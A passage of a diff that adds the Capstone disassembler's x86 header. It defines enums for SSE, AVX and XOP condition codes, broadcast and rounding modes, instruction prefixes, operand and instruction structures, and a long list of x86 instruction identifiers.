X86_XOP_CC_GE, + X86_XOP_CC_EQ, + X86_XOP_CC_NEQ, + X86_XOP_CC_FALSE, + X86_XOP_CC_TRUE, +} x86_xop_cc; + +/// AVX broadcast type +typedef enum x86_avx_bcast { + X86_AVX_BCAST_INVALID = 0, ///< Uninitialized. + X86_AVX_BCAST_2, ///< AVX512 broadcast type {1to2} + X86_AVX_BCAST_4, ///< AVX512 broadcast type {1to4} + X86_AVX_BCAST_8, ///< AVX512 broadcast type {1to8} + X86_AVX_BCAST_16, ///< AVX512 broadcast type {1to16} +} x86_avx_bcast; + +/// SSE Code Condition type +typedef enum x86_sse_cc { + X86_SSE_CC_INVALID = 0, ///< Uninitialized. + X86_SSE_CC_EQ, + X86_SSE_CC_LT, + X86_SSE_CC_LE, + X86_SSE_CC_UNORD, + X86_SSE_CC_NEQ, + X86_SSE_CC_NLT, + X86_SSE_CC_NLE, + X86_SSE_CC_ORD, +} x86_sse_cc; + +/// AVX Code Condition type +typedef enum x86_avx_cc { + X86_AVX_CC_INVALID = 0, ///< Uninitialized. + X86_AVX_CC_EQ, + X86_AVX_CC_LT, + X86_AVX_CC_LE, + X86_AVX_CC_UNORD, + X86_AVX_CC_NEQ, + X86_AVX_CC_NLT, + X86_AVX_CC_NLE, + X86_AVX_CC_ORD, + X86_AVX_CC_EQ_UQ, + X86_AVX_CC_NGE, + X86_AVX_CC_NGT, + X86_AVX_CC_FALSE, + X86_AVX_CC_NEQ_OQ, + X86_AVX_CC_GE, + X86_AVX_CC_GT, + X86_AVX_CC_TRUE, + X86_AVX_CC_EQ_OS, + X86_AVX_CC_LT_OQ, + X86_AVX_CC_LE_OQ, + X86_AVX_CC_UNORD_S, + X86_AVX_CC_NEQ_US, + X86_AVX_CC_NLT_UQ, + X86_AVX_CC_NLE_UQ, + X86_AVX_CC_ORD_S, + X86_AVX_CC_EQ_US, + X86_AVX_CC_NGE_UQ, + X86_AVX_CC_NGT_UQ, + X86_AVX_CC_FALSE_OS, + X86_AVX_CC_NEQ_OS, + X86_AVX_CC_GE_OQ, + X86_AVX_CC_GT_OQ, + X86_AVX_CC_TRUE_US, +} x86_avx_cc; + +/// AVX static rounding mode type +typedef enum x86_avx_rm { + X86_AVX_RM_INVALID = 0, ///< Uninitialized. + X86_AVX_RM_RN, ///< Round to nearest + X86_AVX_RM_RD, ///< Round down + X86_AVX_RM_RU, ///< Round up + X86_AVX_RM_RZ, ///< Round toward zero +} x86_avx_rm; + +/// Instruction prefixes - to be used in cs_x86.prefix[] +typedef enum x86_prefix { + X86_PREFIX_LOCK = 0xf0, ///< lock (cs_x86.prefix[0] + X86_PREFIX_REP = 0xf3, ///< rep (cs_x86.prefix[0] + X86_PREFIX_REPE = 0xf3, ///< repe/repz (cs_x86.prefix[0] + X86_PREFIX_REPNE = 0xf2, ///< repne/repnz (cs_x86.prefix[0] + + X86_PREFIX_CS = 0x2e, ///< segment override CS (cs_x86.prefix[1] + X86_PREFIX_SS = 0x36, ///< segment override SS (cs_x86.prefix[1] + X86_PREFIX_DS = 0x3e, ///< segment override DS (cs_x86.prefix[1] + X86_PREFIX_ES = 0x26, ///< segment override ES (cs_x86.prefix[1] + X86_PREFIX_FS = 0x64, ///< segment override FS (cs_x86.prefix[1] + X86_PREFIX_GS = 0x65, ///< segment override GS (cs_x86.prefix[1] + + X86_PREFIX_OPSIZE = 0x66, ///< operand-size override (cs_x86.prefix[2] + X86_PREFIX_ADDRSIZE = 0x67, ///< address-size override (cs_x86.prefix[3] +} x86_prefix; + +/// Instruction's operand referring to memory +/// This is associated with X86_OP_MEM operand type above +typedef struct x86_op_mem { + x86_reg segment; ///< segment register (or X86_REG_INVALID if irrelevant) + x86_reg base; ///< base register (or X86_REG_INVALID if irrelevant) + x86_reg index; ///< index register (or X86_REG_INVALID if irrelevant) + int scale; ///< scale for index register + int64_t disp; ///< displacement value +} x86_op_mem; + +/// Instruction operand +typedef struct cs_x86_op { + x86_op_type type; ///< operand type + union { + x86_reg reg; ///< register value for REG operand + int64_t imm; ///< immediate value for IMM operand + x86_op_mem mem; ///< base/index/scale/disp value for MEM operand + }; + + /// size of this operand (in bytes). + uint8_t size; + + /// How is this operand accessed? (READ, WRITE or READ|WRITE) + /// This field is combined of cs_ac_type. + /// NOTE: this field is irrelevant if engine is compiled in DIET mode. + uint8_t access; + + /// AVX broadcast type, or 0 if irrelevant + x86_avx_bcast avx_bcast; + + /// AVX zero opmask {z} + bool avx_zero_opmask; +} cs_x86_op; + +typedef struct cs_x86_encoding { + /// ModR/M offset, or 0 when irrelevant + uint8_t modrm_offset; + + /// Displacement offset, or 0 when irrelevant. + uint8_t disp_offset; + uint8_t disp_size; + + /// Immediate offset, or 0 when irrelevant. + uint8_t imm_offset; + uint8_t imm_size; +} cs_x86_encoding; + +/// Instruction structure +typedef struct cs_x86 { + /// Instruction prefix, which can be up to 4 bytes. + /// A prefix byte gets value 0 when irrelevant. + /// prefix[0] indicates REP/REPNE/LOCK prefix (See X86_PREFIX_REP/REPNE/LOCK above) + /// prefix[1] indicates segment override (irrelevant for x86_64): + /// See X86_PREFIX_CS/SS/DS/ES/FS/GS above. + /// prefix[2] indicates operand-size override (X86_PREFIX_OPSIZE) + /// prefix[3] indicates address-size override (X86_PREFIX_ADDRSIZE) + uint8_t prefix[4]; + + /// Instruction opcode, which can be from 1 to 4 bytes in size. + /// This contains VEX opcode as well. + /// An trailing opcode byte gets value 0 when irrelevant. + uint8_t opcode[4]; + + /// REX prefix: only a non-zero value is relevant for x86_64 + uint8_t rex; + + /// Address size, which can be overridden with above prefix[5]. + uint8_t addr_size; + + /// ModR/M byte + uint8_t modrm; + + /// SIB value, or 0 when irrelevant. + uint8_t sib; + + /// Displacement value, valid if encoding.disp_offset != 0 + int64_t disp; + + /// SIB index register, or X86_REG_INVALID when irrelevant. + x86_reg sib_index; + /// SIB scale, only applicable if sib_index is valid. + int8_t sib_scale; + /// SIB base register, or X86_REG_INVALID when irrelevant. + x86_reg sib_base; + + /// XOP Code Condition + x86_xop_cc xop_cc; + + /// SSE Code Condition + x86_sse_cc sse_cc; + + /// AVX Code Condition + x86_avx_cc avx_cc; + + /// AVX Suppress all Exception + bool avx_sae; + + /// AVX static rounding mode + x86_avx_rm avx_rm; + + + union { + /// EFLAGS updated by this instruction. + /// This can be formed from OR combination of X86_EFLAGS_* symbols in x86.h + uint64_t eflags; + /// FPU_FLAGS updated by this instruction. + /// This can be formed from OR combination of X86_FPU_FLAGS_* symbols in x86.h + uint64_t fpu_flags; + }; + + /// Number of operands of this instruction, + /// or 0 when instruction has no operand. + uint8_t op_count; + + cs_x86_op operands[8]; ///< operands for this instruction. + + cs_x86_encoding encoding; ///< encoding information +} cs_x86; + +/// X86 instructions +typedef enum x86_insn { + X86_INS_INVALID = 0, + + X86_INS_AAA, + X86_INS_AAD, + X86_INS_AAM, + X86_INS_AAS, + X86_INS_FABS, + X86_INS_ADC, + X86_INS_ADCX, + X86_INS_ADD, + X86_INS_ADDPD, + X86_INS_ADDPS, + X86_INS_ADDSD, + X86_INS_ADDSS, + X86_INS_ADDSUBPD, + X86_INS_ADDSUBPS, + X86_INS_FADD, + X86_INS_FIADD, + X86_INS_FADDP, + X86_INS_ADOX, + X86_INS_AESDECLAST, + X86_INS_AESDEC, + X86_INS_AESENCLAST, + X86_INS_AESENC, + X86_INS_AESIMC, + X86_INS_AESKEYGENASSIST, + X86_INS_AND, + X86_INS_ANDN, + X86_INS_ANDNPD, + X86_INS_ANDNPS, + X86_INS_ANDPD, + X86_INS_ANDPS, + X86_INS_ARPL, + X86_INS_BEXTR, + X86_INS_BLCFILL, + X86_INS_BLCI, + X86_INS_BLCIC, + X86_INS_BLCMSK, + X86_INS_BLCS, + X86_INS_BLENDPD, + X86_INS_BLENDPS, + X86_INS_BLENDVPD, + X86_INS_BLENDVPS, + X86_INS_BLSFILL, + X86_INS_BLSI, + X86_INS_BLSIC, + X86_INS_BLSMSK, + X86_INS_BLSR, + X86_INS_BOUND, + X86_INS_BSF, + X86_INS_BSR, + X86_INS_BSWAP, + X86_INS_BT, + X86_INS_BTC, + X86_INS_BTR, + X86_INS_BTS, + X86_INS_BZHI, + X86_INS_CALL, + X86_INS_CBW, + X86_INS_CDQ, + X86_INS_CDQE, + X86_INS_FCHS, + X86_INS_CLAC, + X86_INS_CLC, + X86_INS_CLD, + X86_INS_CLFLUSH, + X86_INS_CLFLUSHOPT, + X86_INS_CLGI, + X86_INS_CLI, + X86_INS_CLTS, + X86_INS_CLWB, + X86_INS_CMC, + X86_INS_CMOVA, + X86_INS_CMOVAE, + X86_INS_CMOVB, + X86_INS_CMOVBE, + X86_INS_FCMOVBE, + X86_INS_FCMOVB, + X86_INS_CMOVE, + X86_INS_FCMOVE, + X86_INS_CMOVG, + X86_INS_CMOVGE, + X86_INS_CMOVL, + X86_INS_CMOVLE, + X86_INS_FCMOVNBE, + X86_INS_FCMOVNB, + X86_INS_CMOVNE, + X86_INS_FCMOVNE, + X86_INS_CMOVNO, + X86_INS_CMOVNP, + X86_INS_FCMOVNU, + X86_INS_CMOVNS, + X86_INS_CMOVO, + X86_INS_CMOVP, + X86_INS_FCMOVU, + X86_INS_CMOVS, + X86_INS_CMP, + X86_INS_CMPSB, + X86_INS_CMPSQ, + X86_INS_CMPSW, + X86_INS_CMPXCHG16B, + X86_INS_CMPXCHG, + X86_INS_CMPXCHG8B, + X86_INS_COMISD, + X86_INS_COMISS, + X86_INS_FCOMP, + X86_INS_FCOMIP, + X86_INS_FCOMI, + X86_INS_FCOM, + X86_INS_FCOS, + X86_INS_CPUID, + X86_INS_CQO, + X86_INS_CRC32, + X86_INS_CVTDQ2PD, + X86_INS_CVTDQ2PS, + X86_INS_CVTPD2DQ, + X86_INS_CVTPD2PS, + X86_INS_CVTPS2DQ, + X86_INS_CVTPS2PD, + X86_INS_CVTSD2SI, + X86_INS_CVTSD2SS, + X86_INS_CVTSI2SD, + X86_INS_CVTSI2SS, + X86_INS_CVTSS2SD, + X86_INS_CVTSS2SI, + X86_INS_CVTTPD2DQ, + X86_INS_CVTTPS2DQ, + X86_INS_CVTTSD2SI, + X86_INS_CVTTSS2SI, + X86_INS_CWD, + X86_INS_CWDE, + X86_INS_DAA, + X86_INS_DAS, + X86_INS_DATA16, + X86_INS_DEC, + X86_INS_DIV, + X86_INS_DIVPD, + X86_INS_DIVPS, + X86_INS_FDIVR, + X86_INS_FIDIVR, + X86_INS_FDIVRP, + X86_INS_DIVSD, + X86_INS_DIVSS, + X86_INS_FDIV, + X86_INS_FIDIV, + X86_INS_FDIVP, + X86_INS_DPPD, + X86_INS_DPPS, + X86_INS_RET, + X86_INS_ENCLS, + X86_INS_ENCLU, + X86_INS_ENTER, + X86_INS_EXTRACTPS, + X86_INS_EXTRQ, + X86_INS_F2XM1, + X86_INS_LCALL, + X86_INS_LJMP, + X86_INS_FBLD, + X86_INS_FBSTP, + X86_INS_FCOMPP, + X86_INS_FDECSTP, + X86_INS_FEMMS, + X86_INS_FFREE, + X86_INS_FICOM, + X86_INS_FICOMP, + X86_INS_FINCSTP, + X86_INS_FLDCW, + X86_INS_FLDENV, + X86_INS_FLDL2E, + X86_INS_FLDL2T, + X86_INS_FLDLG2, + X86_INS_FLDLN2, + X86_INS_FLDPI, + X86_INS_FNCLEX, + X86_INS_FNINIT, + X86_INS_FNOP, + X86_INS_FNSTCW, + X86_INS_FNSTSW, + X86_INS_FPATAN, + X86_INS_FPREM, + X86_INS_FPREM1, + X86_INS_FPTAN, + X86_INS_FFREEP, + X86_INS_FRNDINT, + X86_INS_FRSTOR, + X86_INS_FNSAVE, + X86_INS_FSCALE, + X86_INS_FSETPM, + X86_INS_FSINCOS, + X86_INS_FNSTENV, + X86_INS_FXAM, + X86_INS_FXRSTOR, + X86_INS_FXRSTOR64, + X86_INS_FXSAVE, + X86_INS_FXSAVE64, + X86_INS_FXTRACT, + X86_INS_FYL2X, + X86_INS_FYL2XP1, + X86_INS_MOVAPD, + X86_INS_MOVAPS, + X86_INS_ORPD, + X86_INS_ORPS, + X86_INS_VMOVAPD, + X86_INS_VMOVAPS, + X86_INS_XORPD, + X86_INS_XORPS, + X86_INS_GETSEC, + X86_INS_HADDPD, + X86_INS_HADDPS, + X86_INS_HLT, + X86_INS_HSUBPD, + X86_INS_HSUBPS, + X86_INS_IDIV, + X86_INS_FILD, + X86_INS_IMUL, + X86_INS_IN, + X86_INS_INC, + X86_INS_INSB, + X86_INS_INSERTPS, + X86_INS_INSERTQ, + X86_INS_INSD, + X86_INS_INSW, + X86_INS_INT, + X86_INS_INT1, + X86_INS_INT3, + X86_INS_INTO, + X86_INS_INVD, + X86_INS_INVEPT, + X86_INS_INVLPG, + X86_INS_INVLPGA, + X86_INS_INVPCID, + X86_INS_INVVPID, + X86_INS_IRET, + X86_INS_IRETD, + X86_INS_IRETQ, + X86_INS_FISTTP, + X86_INS_FIST, + X86_INS_FISTP, + X86_INS_UCOMISD, + X86_INS_UCOMISS, + X86_INS_VCOMISD, + X86_INS_VCOMISS, + X86_INS_VCVTSD2SS, + X86_INS_VCVTSI2SD, + X86_INS_VCVTSI2SS, + X86_INS_VCVTSS2SD, + X86_INS_VCVTTSD2SI, + X86_INS_VCVTTSD2USI, + X86_INS_VCVTTSS2SI, + X86_INS_VCVTTSS2USI, + X86_INS_VCVTUSI2SD, + X86_INS_VCVTUSI2SS, + X86_INS_VUCOMISD, + X86_INS_VUCOMISS, + X86_INS_JAE, + X86_INS_JA, + X86_INS_JBE, + X86_INS_JB, + X86_INS_JCXZ, + X86_INS_JECXZ, + X86_INS_JE, + X86_INS_JGE, + X86_INS_JG, + X86_INS_JLE, + X86_INS_JL, + X86_INS_JMP, + X86_INS_JNE, + X86_INS_JNO, + X86_INS_JNP, + X86_INS_JNS, + X86_INS_JO, + X86_INS_JP, + X86_INS_JRCXZ, + X86_INS_JS, + X86_INS_KANDB, + X86_INS_KANDD, + X86_INS_KANDNB, + X86_INS_KANDND, + X86_INS_KANDNQ, + X86_INS_KANDNW, + X86_INS_KANDQ, + X86_INS_KANDW, + X86_INS_KMOVB, + X86_INS_KMOVD, + X86_INS_KMOVQ, + X86_INS_KMOVW, + X86_INS_KNOTB, + X86_INS_KNOTD, + X86_INS_KNOTQ, + X86_INS_KNOTW, + X86_INS_KORB, + X86_INS_KORD, + X86_INS_KORQ, + X86_INS_KORTESTB, + X86_INS_KORTESTD, + X86_INS_KORTESTQ, + X86_INS_KORTESTW, + X86_INS_KORW, + X86_INS_KSHIFTLB, + X86_INS_KSHIFTLD, + X86_INS_KSHIFTLQ, + X86_INS_KSHIFTLW, + X86_INS_KSHIFTRB, + X86_INS_KSHIFTRD, + X86_INS_KSHIFTRQ, + X86_INS_KSHIFTRW, + X86_INS_KUNPCKBW, + X86_INS_KXNORB, + X86_INS_KXNORD, + X86_INS_KXNORQ, + X86_INS_KXNORW, + X86_INS_KXORB, + X86_INS_KXORD, + X86_INS_KXORQ, + X86_INS_KXORW, + X86_INS_LAHF, + X86_INS_LAR, + X86_INS_LDDQU, + X86_INS_LDMXCSR, + X86_INS_LDS, + X86_INS_FLDZ, + X86_INS_FLD1, + X86_INS_FLD, + X86_INS_LEA, + X86_INS_LEAVE, + X86_INS_LES, + X86_INS_LFENCE, + X86_INS_LFS, + X86_INS_LGDT, + X86_INS_LGS, + X86_INS_LIDT, + X86_INS_LLDT, + X86_INS_LMSW, + X86_INS_OR, + X86_INS_SUB, + X86_INS_XOR, + X86_INS_LODSB, + X86_INS_LODSD, + X86_INS_LODSQ, + X86_INS_LODSW, + X86_INS_LOOP, + X86_INS_LOOPE, + X86_INS_LOOPNE, + X86_INS_RETF, + X86_INS_RETFQ, + X86_INS_LSL, + X86_INS_LSS, + X86_INS_LTR, + X86_INS_XADD, + X86_INS_LZCNT, + X86_INS_MASKMOVDQU, + X86_INS_MAXPD, + X86_INS_MAXPS, + X86_INS_MAXSD, + X86_INS_MAXSS, + X86_INS_MFENCE, + X86_INS_MINPD, + X86_INS_MINPS, + X86_INS_MINSD, + X86_INS_MINSS, + X86_INS_CVTPD2PI, + X86_INS_CVTPI2PD, + X86_INS_CVTPI2PS, + X86_INS_CVTPS2PI, + X86_INS_CVTTPD2PI, + X86_INS_CVTTPS2PI, + X86_INS_EMMS, + X86_INS_MASKMOVQ, + X86_INS_MOVD, + X86_INS_MOVDQ2Q, + X86_INS_MOVNTQ, + X86_INS_MOVQ2DQ, + X86_INS_MOVQ, + X86_INS_PABSB, + X86_INS_PABSD, + X86_INS_PABSW, + X86_INS_PACKSSDW, + X86_INS_PACKSSWB, + X86_INS_PACKUSWB, + X86_INS_PADDB, + X86_INS_PADDD, + X86_INS_PADDQ, + X86_INS_PADDSB, + X86_INS_PADDSW, + X86_INS_PADDUSB, + X86_INS_PADDUSW, + X86_INS_PADDW, + X86_INS_PALIGNR, + X86_INS_PANDN, + X86_INS_PAND, + X86_INS_PAVGB, + X86_INS_PAVGW, + X86_INS_PCMPEQB, + X86_INS_PCMPEQD, + X86_INS_PCMPEQW, + X86_INS_PCMPGTB, + X86_INS_PCMPGTD, + X86_INS_PCMPGTW, + X86_INS_PEXTRW, + X86_INS_PHADDSW, + X86_INS_PHADDW, + X86_INS_PHADDD, + X86_INS_PHSUBD, + X86_INS_PHSUBSW, + X86_INS_PHSUBW, + X86_INS_PINSRW, + X86_INS_PMADDUBSW, + X86_INS_PMADDWD, + X86_INS_PMAXSW, + X86_INS_PMAXUB, + X86_INS_PMINSW, + X86_INS_PMINUB, + X86_INS_PMOVMSKB, + X86_INS_PMULHRSW, + X86_INS_PMULHUW, + X86_INS_PMULHW, + X86_INS_PMULLW, + X86_INS_PMULUDQ, + X86_INS_POR, + X86_INS_PSADBW, + X86_INS_PSHUFB, + X86_INS_PSHUFW, + X86_INS_PSIGNB, + X86_INS_PSIGND, + X86_INS_PSIGNW, + X86_INS_PSLLD, + X86_INS_PSLLQ, + X86_INS_PSLLW, + X86_INS_PSRAD, + X86_INS_PSRAW, + X86_INS_PSRLD, + X86_INS_PSRLQ, + X86_INS_PSRLW, + X86_INS_PSUBB, + X86_INS_PSUBD, + X86_INS_PSUBQ, + X86_INS_PSUBSB, + X86_INS_PSUBSW, + X86_INS_PSUBUSB, + X86_INS_PSUBUSW, + X86_INS_PSUBW, + X86_INS_PUNPCKHBW, + X86_INS_PUNPCKHDQ, + X86_INS_PUNPCKHWD, + X86_INS_PUNPCKLBW, + X86_INS_PUNPCKLDQ, + X86_INS_PUNPCKLWD, + X86_INS_PXOR, + X86_INS_MONITOR, + X86_INS_MONTMUL, + X86_INS_MOV, + X86_INS_MOVABS, + X86_INS_MOVBE, + X86_INS_MOVDDUP, + X86_INS_MOVDQA, + X86_INS_MOVDQU, + X86_INS_MOVHLPS, + X86_INS_MOVHPD, + X86_INS_MOVHPS, + X86_INS_MOVLHPS, + X86_INS_MOVLPD, + X86_INS_MOVLPS, + X86_INS_MOVMSKPD, + X86_INS_MOVMSKPS, + X86_INS_MOVNTDQA, + X86_INS_MOVNTDQ, + X86_INS_MOVNTI, + X86_INS_MOVNTPD, + X86_INS_MOVNTPS, + X86_INS_MOVNTSD, + X86_INS_MOVNTSS, + X86_INS_MOVSB, + X86_INS_MOVSD, + X86_INS_MOVSHDUP, + X86_INS_MOVSLDUP, + X86_INS_MOVSQ, + X86_INS_MOVSS, + X86_INS_MOVSW, + X86_INS_MOVSX, + X86_INS_MOVSXD, + X86_INS_MOVUPD, + X86_INS_MOVUPS, + X86_INS_MOVZX, + X86_INS_MPSADBW, + X86_INS_MUL, + X86_INS_MULPD, + X86_INS_MULPS, + X86_INS_MULSD, + X86_INS_MULSS, + X86_INS_MULX, + X86_INS_FMUL, + X86_INS_FIMUL, + X86_INS_FMULP, + X86_INS_MWAIT, + X86_INS_NEG, + X86_INS_NOP, + X86_INS_NOT, + X86_INS_OUT, + X86_INS_OUTSB, + X86_INS_OUTSD, + X86_INS_OUTSW, + X86_INS_PACKUSDW, + X86_INS_PAUSE, + X86_INS_PAVGUSB, + X86_INS_PBLENDVB, + X86_INS_PBLENDW, + X86_INS_PCLMULQDQ, + X86_INS_PCMPEQQ, + X86_INS_PCMPESTRI, + X86_INS_PCMPESTRM, + X86_INS_PCMPGTQ, + X86_INS_PCMPISTRI, + X86_INS_PCMPISTRM, + X86_INS_PCOMMIT, + X86_INS_PDEP, + X86_INS_PEXT, + X86_INS_PEXTRB, + X86_INS_PEXTRD, + X86_INS_PEXTRQ, + X86_INS_PF2ID, + X86_INS_PF2IW, + X86_INS_PFACC, + X86_INS_PFADD, + X86_INS_PFCMPEQ, + X86_INS_PFCMPGE, + X86_INS_PFCMPGT, + X86_INS_PFMAX, + X86_INS_PFMIN, + X86_INS_PFMUL, + X86_INS_PFNACC, + X86_INS_PFPNACC, + X86_INS_PFRCPIT1, + X86_INS_PFRCPIT2, + X86_INS_PFRCP, + X86_INS_PFRSQIT1, + X86_INS_PFRSQRT, + X86_INS_PFSUBR, + X86_INS_PFSUB, + X86_INS_PHMINPOSUW, + X86_INS_PI2FD, + X86_INS_PI2FW, + X86_INS_PINSRB, + X86_INS_PINSRD, + X86_INS_PINSRQ, + X86_INS_PMAXSB, + X86_INS_PMAXSD, + X86_INS_PMAXUD, + X86_INS_PMAXUW, + X86_INS_PMINSB, + X86_INS_PMINSD, + X86_INS_PMINUD, + X86_INS_PMINUW, + X86_INS_PMOVSXBD, + X86_INS_PMOVSXBQ, + X86_INS_PMOVSXBW, + X86_INS_PMOVSXDQ, + X86_INS_PMOVSXWD, + X86_INS_PMOVSXWQ, + X86_INS_PMOVZXBD, + X86_INS_PMOVZXBQ, + X86_INS_PMOVZXBW, + X86_INS_PMOVZXDQ, + X86_INS_PMOVZXWD, + X86_INS_PMOVZXWQ, + X86_INS_PMULDQ, + X86_INS_PMULHRW, + X86_INS_PMULLD, + X86_INS_POP, + X86_INS_POPAW, + X86_INS_POPAL, + X86_INS_POPCNT, + X86_INS_POPF, + X86_INS_POPFD, + X86_INS_POPFQ, + X86_INS_PREFETCH, + X86_INS_PREFETCHNTA, + X86_INS_PREFETCHT0, + X86_INS_PREFETCHT1, + X86_INS_PREFETCHT2, + X86_INS_PREFETCHW, + X86_INS_PSHUFD, + X86_INS_PSHUFHW, + X86_INS_PSHUFLW, + X86_INS_PSLLDQ, + X86_INS_PSRLDQ, + X86_INS_PSWAPD, + X86_INS_PTEST, + X86_INS_PUNPCKHQDQ, + X86_INS_PUNPCKLQDQ, + X86_INS_PUSH, + X86_INS_PUSHAW, + X86_INS_PUSHAL, + X86_INS_PUSHF, + X86_INS_PUSHFD, + X86_INS_PUSHFQ, + X86_INS_RCL, + X86_INS_RCPPS, + X86_INS_RCPSS, + X86_INS_RCR, + X86_INS_RDFSBASE, + X86_INS_RDGSBASE, + X86_INS_RDMSR, + X86_INS_RDPMC, + X86_INS_RDRAND, + X86_INS_RDSEED, + X86_INS_RDTSC, + X86_INS_RDTSCP, + X86_INS_ROL, + X86_INS_ROR, + X86_INS_RORX, + X86_INS_ROUNDPD, + X86_INS_ROUNDPS, + X86_INS_ROUNDSD, + X86_INS_ROUNDSS, + X86_INS_RSM, + X86_INS_RSQRTPS, + X86_INS_RSQRTSS, + X86_INS_SAHF, + X86_INS_SAL, + X86_INS_SALC, + X86_INS_SAR, + X86_INS_SARX, + X86_INS_SBB, + X86_INS_SCASB, + X86_INS_SCASD, + X86_INS_SCASQ, + X86_INS_SCASW, + X86_INS_SETAE, + X86_INS_SETA, + X86_INS_SETBE, + X86_INS_SETB, + X86_INS_SETE, + X86_INS_SETGE, + X86_INS_SETG, + X86_INS_SETLE, + X86_INS_SETL, + X86_INS_SETNE, + X86_INS_SETNO, + X86_INS_SETNP, + X86_INS_SETNS, + X86_INS_SETO, + X86_INS_SETP, + X86_INS_SETS, + X86_INS_SFENCE, + X86_INS_SGDT, + X86_INS_SHA1MSG1, + X86_INS_SHA1MSG2, + X86_INS_SHA1NEXTE, + X86_INS_SHA1RNDS4, + X86_INS_SHA256MSG1, + X86_INS_SHA256MSG2, + X86_INS_SHA256RNDS2, + X86_INS_SHL, + X86_INS_SHLD, + X86_INS_SHLX, + X86_INS_SHR, + X86_INS_SHRD, + X86_INS_SHRX, + X86_INS_SHUFPD, + X86_INS_SHUFPS, + X86_INS_SIDT, + X86_INS_FSIN, + X86_INS_SKINIT, + X86_INS_SLDT, + X86_INS_SMSW, + X86_INS_SQRTPD, + X86_INS_SQRTPS, + X86_INS_SQRTSD, + X86_INS_SQRTSS, + X86_INS_FSQRT, + X86_INS_STAC, + X86_INS_STC, + X86_INS_STD, + X86_INS_STGI, + X86_INS_STI, + X86_INS_STMXCSR, + X86_INS_STOSB, + X86_INS_STOSD, + X86_INS_STOSQ, + X86_INS_STOSW, + X86_INS_STR, + X86_INS_FST, + X86_INS_FSTP, + X86_INS_FSTPNCE, + X86_INS_FXCH, + X86_INS_SUBPD, + X86_INS_SUBPS, + X86_INS_FSUBR, + X86_INS_FISUBR, + X86_INS_FSUBRP, + X86_INS_SUBSD, + X86_INS_SUBSS, + X86_INS_FSUB, + X86_INS_FISUB, + X86_INS_FSUBP, + X86_INS_SWAPGS, + X86_INS_SYSCALL, + X86_INS_SYSENTER, + X86_INS_SYSEXIT, + X86_INS_SYSRET, + X86_INS_T1MSKC, + X86_INS_TEST, + X86_INS_UD2, + X86_INS_FTST, + X86_INS_TZCNT, + X86_INS_TZMSK, + X86_INS_FUCOMIP, + X86_INS_FUCOMI, + X86_INS_FUCOMPP, + X86_INS_FUCOMP, + X86_INS_FUCOM, + X86_INS_UD2B, + X86_INS_UNPCKHPD, + X86_INS_UNPCKHPS, + X86_INS_UNPCKLPD, + X86_INS_UNPCKLPS, + X86_INS_VADDPD, + X86_INS_VADDPS, + X86_INS_VADDSD, + X86_INS_VADDSS, + X86_INS_VADDSUBPD, + X86_INS_VADDSUBPS, + X86_INS_VAESDECLAST, + X86_INS_VAESDEC, + X86_INS_VAESENCLAST, + X86_INS_VAESENC, + X86_INS_VAESIMC, + X86_INS_VAESKEYGENASSIST, + X86_INS_VALIGND, + X86_INS_VALIGNQ, + X86_INS_VANDNPD, + X86_INS_VANDNPS, + X86_INS_VANDPD, + X86_INS_VANDPS, + X86_INS_VBLENDMPD, + X86_INS_VBLENDMPS, + X86_INS_VBLENDPD, + X86_INS_VBLENDPS, + X86_INS_VBLENDVPD, + X86_INS_VBLENDVPS, + X86_INS_VBROADCASTF128, + X86_INS_VBROADCASTI32X4, + X86_INS_VBROADCASTI64X4, + X86_INS_VBROADCASTSD, + X86_INS_VBROADCASTSS, + X86_INS_VCOMPRESSPD, + X86_INS_VCOMPRESSPS, + X86_INS_VCVTDQ2PD, + X86_INS_VCVTDQ2PS, + X86_INS_VCVTPD2DQX, + X86_INS_VCVTPD2DQ, + X86_INS_VCVTPD2PSX, + X86_INS_VCVTPD2PS, + X86_INS_VCVTPD2UDQ, + X86_INS_VCVTPH2PS, + X86_INS_VCVTPS2DQ, + X86_INS_VCVTPS2PD, + X86_INS_VCVTPS2PH, + X86_INS_VCVTPS2UDQ, + X86_INS_VCVTSD2SI, + X86_INS_VCVTSD2USI, + X86_INS_VCVTSS2SI, + X86_INS_VCVTSS2USI, + X86_INS_VCVTTPD2DQX, + X86_INS_VCVTTPD2DQ, + X86_INS_VCVTTPD2UDQ, + X86_INS_VCVTTPS2DQ, + X86_INS_VCVTTPS2UDQ, + X86_INS_VCVTUDQ2PD, + X86_INS_VCVTUDQ2PS, + X86_INS_VDIVPD, + X86_INS_VDIVPS, + X86_INS_VDIVSD, + X86_INS_VDIVSS, + X86_INS_VDPPD, + X86_INS_VDPPS, + X86_INS_VERR, + X86_INS_VERW, + X86_INS_VEXP2PD, + X86_INS_VEXP2PS, + X86_INS_VEXPANDPD, + X86_INS_VEXPANDPS, + X86_INS_VEXTRACTF128, + X86_INS_VEXTRACTF32X4, + X86_INS_VEXTRACTF64X4, + X86_INS_VEXTRACTI128, + X86_INS_VEXTRACTI32X4, + X86_INS_VEXTRACTI64X4, + X86_INS_VEXTRACTPS, + X86_INS_VFMADD132PD, + X86_INS_VFMADD132PS, + X86_INS_VFMADDPD, + X86_INS_VFMADD213PD, + X86_INS_VFMADD231PD, + X86_INS_VFMADDPS, + X86_INS_VFMADD213PS, + X86_INS_VFMADD231PS, + X86_INS_VFMADDSD, + X86_INS_VFMADD213SD, + X86_INS_VFMADD132SD, + X86_INS_VFMADD231SD, + X86_INS_VFMADDSS, + X86_INS_VFMADD213SS, + X86_INS_VFMADD132SS, + X86_INS_VFMADD231SS, + X86_INS_VFMADDSUB132PD, + X86_INS_VFMADDSUB132PS, + X86_INS_VFMADDSUBPD, + X86_INS_VFMADDSUB213PD, + X86_INS_VFMADDSUB231PD, + X86_INS_VFMADDSUBPS, + X86_INS_VFMADDSUB213PS, + X86_INS_VFMADDSUB231PS, + X86_INS_VFMSUB132PD, + X86_INS_VFMSUB132PS, + X86_INS_VFMSUBADD132PD, + X86_INS_VFMSUBADD132PS, + X86_INS_VFMSUBADDPD, + X86_INS_VFMSUBADD213PD, + X86_INS_VFMSUBADD231PD, + X86_INS_VFMSUBADDPS, + X86_INS_VFMSUBADD213PS, + X86_INS_VFMSUBADD231PS, + X86_INS_VFMSUBPD, + X86_INS_VFMSUB213PD, + X86_INS_VFMSUB231PD, + X86_INS_VFMSUBPS, + X86_INS_VFMSUB213PS, + X86_INS_VFMSUB231PS, + X86_INS_VFMSUBSD, + X86_INS_VFMSUB213SD, + X86_INS_VFMSUB132SD, + X86_INS_VFMSUB231SD, + X86_INS_VFMSUBSS, + X86_INS_VFMSUB213SS, + X86_INS_VFMSUB132SS, + X86_INS_VFMSUB231SS, + 